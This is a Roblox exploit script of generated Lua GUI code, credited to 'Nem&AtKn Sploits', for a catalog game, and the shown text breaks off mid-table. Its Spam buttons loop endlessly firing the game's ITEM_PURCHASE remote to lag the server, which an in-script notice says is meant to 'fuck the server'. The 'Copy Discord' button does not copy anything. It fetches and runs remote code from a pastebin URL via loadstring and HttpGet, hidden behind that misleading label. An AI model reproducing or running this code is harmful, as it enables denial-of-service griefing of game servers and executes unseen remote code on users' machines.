-- Gui to Lua
-- Version: 3.2

-- Instances:

local CatalogGameGui = Instance.new("ScreenGui")
local Pages = Instance.new("Frame")
local Credits = Instance.new("Frame")
local Hub = Instance.new("Frame")
local UIGridLayout = Instance.new("UIGridLayout")
local UIPadding = Instance.new("UIPadding")
local ADiscord = Instance.new("TextButton")
local GuiBy = Instance.new("TextLabel")
local DesignBy = Instance.new("TextLabel")
local ScriptBy = Instance.new("TextLabel")
local Rainbow = Instance.new("Frame")
local Name = Instance.new("TextLabel")
local CloseOpen = Instance.new("TextButton")
local info = Instance.new("TextLabel")
local Misc = Instance.new("Frame")
local Hub_2 = Instance.new("Frame")
local UIGridLayout_2 = Instance.new("UIGridLayout")
local UIPadding_2 = Instance.new("UIPadding")
local AntiLag = Instance.new("TextButton")
local DropHats = Instance.new("TextButton")
local Spam1 = Instance.new("TextButton")
local Spam2 = Instance.new("TextButton")
local Rainbow_2 = Instance.new("Frame")
local Name_2 = Instance.new("TextLabel")
local CloseOpen_2 = Instance.new("TextButton")

--Properties:

CatalogGameGui.Name = "CatalogGameGui"
CatalogGameGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
CatalogGameGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
CatalogGameGui.ResetOnSpawn = false

Pages.Name = "Pages"
Pages.Parent = CatalogGameGui
Pages.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Pages.BackgroundTransparency = 1.000
Pages.Size = UDim2.new(0, 100, 0, 100)
Pages.ZIndex = 1000000000

Credits.Name = "Credits"
Credits.Parent = Pages
Credits.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Credits.Position = UDim2.new(8.97000027, 0, 0.140000001, 0)
Credits.Size = UDim2.new(0, 195, 0, 30)

Hub.Name = "Hub"
Hub.Parent = Credits
Hub.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Hub.Position = UDim2.new(0, 0, 1.06666672, 0)
Hub.Size = UDim2.new(0, 195, 0, 175)

UIGridLayout.Parent = Hub
UIGridLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center
UIGridLayout.CellSize = UDim2.new(0, 180, 0, 25)

UIPadding.Parent = Hub
UIPadding.PaddingBottom = UDim.new(0, 5)
UIPadding.PaddingLeft = UDim.new(0, 5)
UIPadding.PaddingRight = UDim.new(0, 5)
UIPadding.PaddingTop = UDim.new(0, 5)

ADiscord.Name = "ADiscord"
ADiscord.Parent = Hub
ADiscord.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
ADiscord.BorderColor3 = Color3.fromRGB(0, 0, 0)
ADiscord.Position = UDim2.new(-0.00666666683, 0, -0.0411984995, 0)
ADiscord.Size = UDim2.new(0, 200, 0, 50)
ADiscord.Font = Enum.Font.SourceSansSemibold
ADiscord.Text = "Copy Discord"
ADiscord.TextColor3 = Color3.fromRGB(255, 255, 255)
ADiscord.TextSize = 17.000

GuiBy.Name = "GuiBy"
GuiBy.Parent = Hub
GuiBy.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
GuiBy.BorderColor3 = Color3.fromRGB(0, 0, 0)
GuiBy.Size = UDim2.new(0, 200, 0, 50)
GuiBy.Font = Enum.Font.SourceSansSemibold
GuiBy.Text = "Gui by Nem&AtKn Sploits™"
GuiBy.TextColor3 = Color3.fromRGB(255, 255, 255)
GuiBy.TextSize = 17.000

DesignBy.Name = "DesignBy"
DesignBy.Parent = Hub
DesignBy.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
DesignBy.BorderColor3 = Color3.fromRGB(0, 0, 0)
DesignBy.Size = UDim2.new(0, 200, 0, 50)
DesignBy.Font = Enum.Font.SourceSansSemibold
DesignBy.Text = "Design by Nemsploits™"
DesignBy.TextColor3 = Color3.fromRGB(255, 255, 255)
DesignBy.TextSize = 17.000

ScriptBy.Name = "ScriptBy"
ScriptBy.Parent = Hub
ScriptBy.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
ScriptBy.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScriptBy.Size = UDim2.new(0, 200, 0, 50)
ScriptBy.Font = Enum.Font.SourceSansSemibold
ScriptBy.Text = "Script by Nem&AtKn Sploits™"
ScriptBy.TextColor3 = Color3.fromRGB(255, 255, 255)
ScriptBy.TextSize = 17.000

Rainbow.Name = "Rainbow"
Rainbow.Parent = Credits
Rainbow.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Rainbow.BorderSizePixel = 0
Rainbow.Position = UDim2.new(0, 0, 1, 0)
Rainbow.Size = UDim2.new(0, 195, 0, 2)

Name.Name = "Name"
Name.Parent = Credits
Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Name.BackgroundTransparency = 1.000
Name.Position = UDim2.new(0.189225882, 0, 0, 0)
Name.Size = UDim2.new(0, 120, 0, 30)
Name.Font = Enum.Font.SourceSansSemibold
Name.Text = "Credits"
Name.TextColor3 = Color3.fromRGB(255, 255, 255)
Name.TextScaled = true
Name.TextSize = 14.000
Name.TextWrapped = true

CloseOpen.Name = "Close/Open"
CloseOpen.Parent = Credits
CloseOpen.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CloseOpen.BackgroundTransparency = 1.000
CloseOpen.Position = UDim2.new(0.843177199, 0, 0, 0)
CloseOpen.Size = UDim2.new(0, 30, 0, 30)
CloseOpen.Font = Enum.Font.SourceSans
CloseOpen.Text = "-"
CloseOpen.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseOpen.TextScaled = true
CloseOpen.TextSize = 14.000
CloseOpen.TextWrapped = true

info.Name = "info"
info.Parent = Credits
info.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
info.BackgroundTransparency = 1.000
info.BorderColor3 = Color3.fromRGB(0, 0, 0)
info.Position = UDim2.new(0.0342598148, 0, 5.2102561, 0)
info.Size = UDim2.new(0, 180, 0, 45)
info.Font = Enum.Font.SourceSansSemibold
info.Text = "[!] Press insert to open and close the gui."
info.TextColor3 = Color3.fromRGB(255, 255, 255)
info.TextScaled = true
info.TextSize = 14.000
info.TextWrapped = true

Misc.Name = "Misc"
Misc.Parent = Pages
Misc.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Misc.Position = UDim2.new(6.71000004, 0, 0.140000001, 0)
Misc.Size = UDim2.new(0, 195, 0, 30)

Hub_2.Name = "Hub"
Hub_2.Parent = Misc
Hub_2.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Hub_2.Position = UDim2.new(0, 0, 1.06666672, 0)
Hub_2.Size = UDim2.new(0, 195, 0, 124)

UIGridLayout_2.Parent = Hub_2
UIGridLayout_2.HorizontalAlignment = Enum.HorizontalAlignment.Center
UIGridLayout_2.CellSize = UDim2.new(0, 180, 0, 25)

UIPadding_2.Parent = Hub_2
UIPadding_2.PaddingBottom = UDim.new(0, 5)
UIPadding_2.PaddingLeft = UDim.new(0, 5)
UIPadding_2.PaddingRight = UDim.new(0, 5)
UIPadding_2.PaddingTop = UDim.new(0, 5)

AntiLag.Name = "AntiLag"
AntiLag.Parent = Hub_2
AntiLag.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
AntiLag.BorderColor3 = Color3.fromRGB(0, 0, 0)
AntiLag.Position = UDim2.new(-0.00666666683, 0, -0.0411984995, 0)
AntiLag.Size = UDim2.new(0, 200, 0, 50)
AntiLag.Font = Enum.Font.SourceSansSemibold
AntiLag.Text = "Client Anti Lag"
AntiLag.TextColor3 = Color3.fromRGB(255, 255, 255)
AntiLag.TextSize = 17.000

DropHats.Name = "DropHats"
DropHats.Parent = Hub_2
DropHats.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
DropHats.BorderColor3 = Color3.fromRGB(0, 0, 0)
DropHats.Position = UDim2.new(-0.00666666683, 0, -0.0411984995, 0)
DropHats.Size = UDim2.new(0, 200, 0, 50)
DropHats.Font = Enum.Font.SourceSansSemibold
DropHats.Text = "Drop Hats"
DropHats.TextColor3 = Color3.fromRGB(255, 255, 255)
DropHats.TextSize = 17.000

Spam1.Name = "Spam1"
Spam1.Parent = Hub_2
Spam1.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Spam1.BorderColor3 = Color3.fromRGB(0, 0, 0)
Spam1.Position = UDim2.new(-0.00666666683, 0, -0.0411984995, 0)
Spam1.Size = UDim2.new(0, 200, 0, 50)
Spam1.Font = Enum.Font.SourceSansSemibold
Spam1.Text = "Spam1"
Spam1.TextColor3 = Color3.fromRGB(255, 255, 255)
Spam1.TextSize = 17.000

Spam2.Name = "Spam2"
Spam2.Parent = Hub_2
Spam2.BackgroundColor3 = Color3.fromRGB(39, 39, 39)
Spam2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Spam2.Position = UDim2.new(-0.00666666683, 0, -0.0411984995, 0)
Spam2.Size = UDim2.new(0, 200, 0, 50)
Spam2.Font = Enum.Font.SourceSansSemibold
Spam2.Text = "Spam2"
Spam2.TextColor3 = Color3.fromRGB(255, 255, 255)
Spam2.TextSize = 17.000

Rainbow_2.Name = "Rainbow"
Rainbow_2.Parent = Misc
Rainbow_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Rainbow_2.BorderSizePixel = 0
Rainbow_2.Position = UDim2.new(0, 0, 1, 0)
Rainbow_2.Size = UDim2.new(0, 195, 0, 2)

Name_2.Name = "Name"
Name_2.Parent = Misc
Name_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Name_2.BackgroundTransparency = 1.000
Name_2.Position = UDim2.new(0.189225882, 0, 0, 0)
Name_2.Size = UDim2.new(0, 120, 0, 30)
Name_2.Font = Enum.Font.SourceSansSemibold
Name_2.Text = "Misc"
Name_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Name_2.TextScaled = true
Name_2.TextSize = 14.000
Name_2.TextWrapped = true

CloseOpen_2.Name = "Close/Open"
CloseOpen_2.Parent = Misc
CloseOpen_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CloseOpen_2.BackgroundTransparency = 1.000
CloseOpen_2.Position = UDim2.new(0.843177199, 0, 0, 0)
CloseOpen_2.Size = UDim2.new(0, 30, 0, 30)
CloseOpen_2.Font = Enum.Font.SourceSans
CloseOpen_2.Text = "-"
CloseOpen_2.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseOpen_2.TextScaled = true
CloseOpen_2.TextSize = 14.000
CloseOpen_2.TextWrapped = true

-- Scripts:

local function MAMWW_fake_script() -- Pages.Toggle 
	local script = Instance.new('LocalScript', Pages)

	function PopupGui()
	if script.Parent.Visible==true then script.Parent.Visible=false
	else script.Parent.Visible=true
	end
	end
	
	
	game:GetService("UserInputService").InputBegan:Connect(function(key)
	if key.KeyCode==Enum.KeyCode.Insert then
	PopupGui()
	end
	end)
end
coroutine.wrap(MAMWW_fake_script)()
local function CAONQIP_fake_script() -- ADiscord.Script 
	local script = Instance.new('Script', ADiscord)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://pastebin.com/raw/TwyyG5mJ", true))()
	end)
end
coroutine.wrap(CAONQIP_fake_script)()
local function IWAKO_fake_script() -- ADiscord.Message 
	local script = Instance.new('LocalScript', ADiscord)

	local StarterGui = game:GetService("StarterGui")
	local button = script.Parent
	
	local Notifications = {
		"Notification Message 1",
	}
	
	local TimeBetweenNotifications = 5 --REPLACE 5 WITH THE NUMBER OF SECONDS YOU WANT TO WAIT IN BETWEEN NOTIFICATIONS APPEARING
	
	button.MouseButton1Click:Connect(function()
		for i = 1, #Notifications do
			local Notification = Notifications[i]
				
			StarterGui:SetCore("SendNotification", {
				Title = "Discord";
				Text = "Coppied discord to clipboard!";
				Icon = "rbxassetid://1734216532";
				Duration = 5;
			})
				
			wait(TimeBetweenNotifications)
		end
	end)
end
coroutine.wrap(IWAKO_fake_script)()
local function TVYWA_fake_script() -- Rainbow.RainbowFunction 
	local script = Instance.new('LocalScript', Rainbow)

	while true do 
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(i, 0, n)
	wait() 
	end
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(n, i, 0)
	wait()
	end
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(0, n, i)
	wait() 
	end 
	end
end
coroutine.wrap(TVYWA_fake_script)()
local function BLBUAK_fake_script() -- CloseOpen.Script 
	local script = Instance.new('Script', CloseOpen)

	local hub = script.Parent.Parent.Hub
	local button = script.Parent
	local info = script.Parent.Parent.info
	
	button.MouseButton1Click:Connect(function()
	if hub.Visible==true then button.Text="+" hub.Visible=false info.Visible=false
	else hub.Visible=true button.Text="-" info.Visible=true
	end
	end)
end
coroutine.wrap(BLBUAK_fake_script)()
local function IBCUJ_fake_script() -- Credits.Dragging 
	local script = Instance.new('LocalScript', Credits)

	local lplayer = game:GetService('Players').LocalPlayer
	local UIS = game:GetService("UserInputService")
	wait(1)
	
	
	function dragify(Frame)
	    dragToggle = nil
	    dragSpeed = 1
	    dragInput = nil
	    dragStart = nil
	    dragPos = nil
	    function updateInput(input)
	        Delta = input.Position - dragStart
	        Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			if UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
			        end
			end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	dragify(script.Parent)
end
coroutine.wrap(IBCUJ_fake_script)()
local function SOFLOR_fake_script() -- AntiLag.Script 
	local script = Instance.new('Script', AntiLag)

	local button = script.Parent
	_G.AntiLag = false
	
	button.MouseButton1Click:Connect(function()
		_G.AntiLag = true
		
		while wait() do
			if _G.AntiLag == true then
				for i,v in pairs(game.Workspace:GetChildren()) do 
					if v:IsA("Accessory") then v:Destroy()
					end 
				end
			end
		end
	end)
end
coroutine.wrap(SOFLOR_fake_script)()
local function KZIW_fake_script() -- AntiLag.Message 
	local script = Instance.new('LocalScript', AntiLag)

	local StarterGui = game:GetService("StarterGui")
	local button = script.Parent
	
	local Notifications = {
		"Notification Message 1",
	}
	
	local TimeBetweenNotifications = 5 --REPLACE 5 WITH THE NUMBER OF SECONDS YOU WANT TO WAIT IN BETWEEN NOTIFICATIONS APPEARING
	
	button.MouseButton1Click:Connect(function()
		for i = 1, #Notifications do
			local Notification = Notifications[i]
				
			StarterGui:SetCore("SendNotification", {
				Title = "Anti Lag";
				Text = "This function removes hats from workspace only on your client and helps you to fuck the server easly if you are using a trash computer.";
				Duration = 5;
			})
				
			wait(TimeBetweenNotifications)
		end
	end)
end
coroutine.wrap(KZIW_fake_script)()
local function OQVVTV_fake_script() -- DropHats.Script 
	local script = Instance.new('Script', DropHats)

	local button = script.Parent
	_G.Hat = false
	
	button.MouseButton1Click:Connect(function()
		_G.Hat = true
		
		while wait() do
			if _G.Hat == true then
				for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
					if (v:IsA("Accessory")) then
						v.Parent = workspace
					end
				end
			end
		end
	end)
end
coroutine.wrap(OQVVTV_fake_script)()
local function PXJDUO_fake_script() -- Spam1.Script 
	local script = Instance.new('Script', Spam1)

	local button = script.Parent
	_G.Lag1 = false
	
	button.MouseButton1Click:Connect(function()
		_G.Lag1 = true
		
		while wait() do
			if _G.Lag1 == true then
				local args = {
					[1] = "Sparkling Angel Wings",
					[2] = "46",
					[3] = "192557913",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Spring Fairy",
					[2] = "44",
					[3] = "150381051",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Flaming Mohawk",
					[2] = "41",
					[3] = "191101707",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Menacing",
					[2] = "8",
					[3] = "4238305136",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Fiery Horns of the Netherworld",
					[2] = "8",
					[3] = "215718515",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Frozen Horns of the Frigid Planes",
					[2] = "8",
					[3] = "74891470",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Cursed Flames",
					[2] = "45",
					[3] = "3756389957",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
			end
		end
	end)
end
coroutine.wrap(PXJDUO_fake_script)()
local function SHUCO_fake_script() -- Spam2.Script 
	local script = Instance.new('Script', Spam2)

	local button = script.Parent
	_G.Lag = false
	
	button.MouseButton1Click:Connect(function()
		_G.Lag = true
		
		while true do
			if _G.Lag == true then
				local args = {
					[1] = "Sparkling Angel Wings",
					[2] = "46",
					[3] = "192557913",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Spring Fairy",
					[2] = "44",
					[3] = "150381051",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Flaming Mohawk",
					[2] = "41",
					[3] = "191101707",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Menacing",
					[2] = "8",
					[3] = "4238305136",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Fiery Horns of the Netherworld",
					[2] = "8",
					[3] = "215718515",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Frozen Horns of the Frigid Planes",
					[2] = "8",
					[3] = "74891470",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Cursed Flames",
					[2] = "45",
					[3] = "3756389957",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Cursed Flames",
					[2] = "45",
					[3] = "3756389957",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Red Flame Aura - Top",
					[2] = "44",
					[3] = "5548638720",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "52 Pickup",
					[2] = "8",
					[3] = "4904139820",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Rainbow Katana Set",
					[2] = "47",
					[3] = "5410248084",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Red Flame Aura",
					[2] = "47",
					[3] = "5463718312",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Kawaii Confetti",
					[2] = "8",
					[3] = "5067732877",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Neon Flame Aura",
					[2] = "47",
					[3] = "5463621720",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Blue Butterflies",
					[2] = "8",
					[3] = "4597874025",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Demon",
					[2] = "46",
					[3] = "5319867017",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Falling Blossoms",
					[2] = "8",
					[3] = "4665773975",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Sakura Aura",
					[2] = "47",
					[3] = "5321023132",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Dark Flame Aura",
					[2] = "47",
					[3] = "5463688787",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Sparkling Shine",
					[2] = "8",
					[3] = "4641935884",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Neon Flame Aura - Top",
					[2] = "44",
					[3] = "5548531343",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Sleep Paralysis Demon",
					[2] = "46",
					[3] = "4932832113",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Outline Spiked Floof Tail",
					[2] = "47",
					[3] = "5355976632",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Banded Top Hat",
					[2] = "8",
					[3] = "5275861024",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Fedora",
					[2] = "8",
					[3] = "5314012437",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Corruption Henchmen",
					[2] = "47",
					[3] = "5063561894",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Menacing",
					[2] = "8",
					[3] = "4238305136",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Rainbow Growing Corruption Right",
					[2] = "42",
					[3] = "5314332058",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Dark Matter Fedora",
					[2] = "8",
					[3] = "5357509575",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Dark Matter Sword",
					[2] = "46",
					[3] = "5355685721",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Robe",
					[2] = "46",
					[3] = "5314965699",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Negative Horns",
					[2] = "8",
					[3] = "5233472439",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Dark Matter Head",
					[2] = "8",
					[3] = "5355731757",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Bow Tie",
					[2] = "43",
					[3] = "5314000093",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Gamer Keyboard",
					[2] = "46",
					[3] = "5548852071",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Rainbow Cartoon Demon",
					[2] = "8",
					[3] = "5410759729",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Halo",
					[2] = "8",
					[3] = "5230690394",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Antlers",
					[2] = "8",
					[3] = "5197568832",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Rave Mask",
					[2] = "42",
					[3] = "5319940357",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				-- Script generated by SimpleSpy - credits to exxtremewa#9394
				-- Powered by highlight.lua
				
				local args = {
					[1] = "Cartoony Rainbow Head",
					[2] = "8",
					[3] = "5231646851",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Cursed Flames",
					[2] = "45",
					[3] = "3756389957",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				local args = {
					[1] = "Sparkling Angel Wings",
					[2] = "46",
					[3] = "192557913",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
				wait()
				local args2 = {
					[1] = "Flaming Mohawk",
					[2] = "41",
					[3] = "191101707",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args2))
				wait()
				local args3 = {
					[1] = "Spring Fairy",
					[2] = "44",
					[3] = "150381051",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args3))
				wait()
				local args = {
					[1] = "Black Trendy Hat",
					[2] = "8",
					[3] = "4904891637",
				}
				
				game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
			end
		end
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
